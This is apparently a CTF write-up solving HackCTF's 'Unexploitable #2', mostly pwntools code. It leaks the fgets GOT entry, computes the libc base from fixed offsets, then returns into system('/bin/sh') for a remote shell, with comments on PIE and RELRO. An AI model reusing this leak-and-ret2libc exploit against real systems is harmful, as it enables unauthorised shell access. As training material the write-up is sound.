ii4gsp
HackCTF - Unexploitable #2 본문
# Stage 1 of the author's HackCTF "Unexploitable #2" solution (pwntools).
# Purpose: read the runtime address stored in the binary's GOT entry for fgets.
# NOTE: this is Python 2-era code -- a str ('') is concatenated with the bytes
# returned by p64()/recv(), which raises TypeError on Python 3.
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3029)
e = ELF('./Unexploitable_2')  # used only to resolve the GOT/PLT symbol addresses below
context.log_level = 'debug'
payload = ''
payload += '\x90' * 0x18  # 0x18 bytes of filler; presumably the distance to the saved return address -- TODO confirm against the binary
payload += p64(0x0000000000400773)  # fixed in-binary address: the script assumes a non-PIE build
payload += p64(e.got['fgets'])  # GOT slot of fgets, placed as the word before the PLT call
payload += p64(e.plt['system'])
payload += p64(0x40068c)  # return target after the PLT call; presumably re-enters the input routine -- TODO confirm
r.sendlineafter('\n', payload)
r.recvuntil('1: ')
leak = u64(r.recv(6) + '\x00\x00')  # 6 raw bytes of a 64-bit address, zero-padded to 8 before unpacking
# NOTE(review): a leak like this needs the GOT at a fixed, readable address; PIE removes
# the fixed address, and full RELRO makes the table read-only (it stops writes, not reads).
log.info('leak : ' + hex(leak))
fgets() Leak
fgets() 하위 바이트 0x5ad0
system_offset = 0x45390
fgets_offset = 0x6dad0
"/bin/sh" string offset = 0x18cd57
# Full two-stage solution for HackCTF "Unexploitable #2" (pwntools).
# Stage 1 repeats the fgets GOT leak; stage 2 turns it into a libc base and
# returns into system("/bin/sh").
# NOTE: Python 2-era code -- str ('') is concatenated with bytes from p64()/recv(),
# which raises TypeError on Python 3.
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3029)
e = ELF('./Unexploitable_2')  # used only to resolve the GOT/PLT symbol addresses
context.log_level = 'debug'
# Offsets inside one specific libc build (taken from the author's notes above).
# They are only valid for that exact build; any other libc version makes every
# computed address below wrong.
system_offset = 0x045390
fgets_offset = 0x06dad0
binsh_offset = 0x18cd57
payload = ''
payload += '\x90' * 0x18  # filler; presumably the distance to the saved return address -- TODO confirm
payload += p64(0x0000000000400773)  # fixed in-binary address: assumes a non-PIE build
payload += p64(e.got['fgets'])  # GOT slot of fgets, placed as the word before the PLT call
payload += p64(e.plt['system'])
payload += p64(0x40068c)  # return target afterwards; presumably re-enters the input routine so stage 2 can be sent -- TODO confirm
r.sendlineafter('\n', payload)
r.recvuntil('1: ')
leak = u64(r.recv(6) + '\x00\x00')  # 6 raw address bytes, zero-padded to 8
libc_base = leak - fgets_offset  # leak is the runtime address of fgets; subtract its offset to get the load base
system = libc_base + system_offset
binsh = libc_base + binsh_offset
log.info('libc_base : ' + hex(libc_base))
log.info('system : ' + hex(system))
log.info('binsh : ' + hex(binsh))
# Stage 2: same prefix as stage 1, then (binsh, system) -- a return-to-libc layout
# that assumes 0x400773 pops the first argument register; confirm in a disassembler.
# NOTE(review): ASLR alone does not stop this because the base is recovered from
# the stage-1 leak; preventing the leak (PIE, no GOT disclosure) is what breaks it.
payload = ''
payload += '\x90' * 0x18
payload += p64(0x0000000000400773)
payload += p64(binsh)
payload += p64(system)
r.sendlineafter('\n', payload)
r.interactive()  # hand the connection over to the user
Exploit